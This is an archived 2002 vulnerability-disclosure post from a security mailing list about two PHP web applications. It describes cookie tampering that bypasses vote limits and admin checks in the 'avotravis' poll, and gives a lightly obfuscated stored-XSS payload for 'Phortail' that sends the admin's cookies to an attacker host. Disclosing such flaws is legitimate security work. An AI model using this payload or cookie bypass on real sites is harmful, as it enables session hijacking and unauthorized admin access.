Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Vulnerability Development mailing list archives

Security holes in two PHP services.
From: frog frog <leseulfrog () hotmail com>
Date: 1 Mar 2002 16:37:08 -0000


The first one is poll "avotravis " versions 2.1 and less. 

1) Distortion of the limitations of multiple votes :
Set the cookie with the name "already_voted" and 
value "1" to the url /avotravis.php3?vote=1 for "yes" 
and /avotravis.php3?vote=1 for "no".

2) Access to the part administration :
Set the cookie "adminsondage", "true" to the 
webpage http://www.host.com/admin.php3

More details in french :
http://www.ifrance.com/kitetoua/tuto/avotravis.txt


The second is the portal "Phortail" versions 1.2.1 and 
less.

Admin password is sent uncrypted by cookie and 
there isn't limitation in the posting of the news for the 
scripts. 
It is enough to send this kind of script :
<im*g src="javascri*pt:phortail()">
<s*cript>function phortail() { 
a="http://haxor.com/file?"+document.cookie; 
window.open(a); } </s*cript>
(without '*') like a new and wait the admin...

More details in french :
http://www.ifrance.com/kitetoua/tuto/phortail.txt


Creators are alerted.
Sorry for my bad english.
frog-m () n

  By Date           By Thread  

Current thread:
  • Security holes in two PHP services. frog frog (Mar 04)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]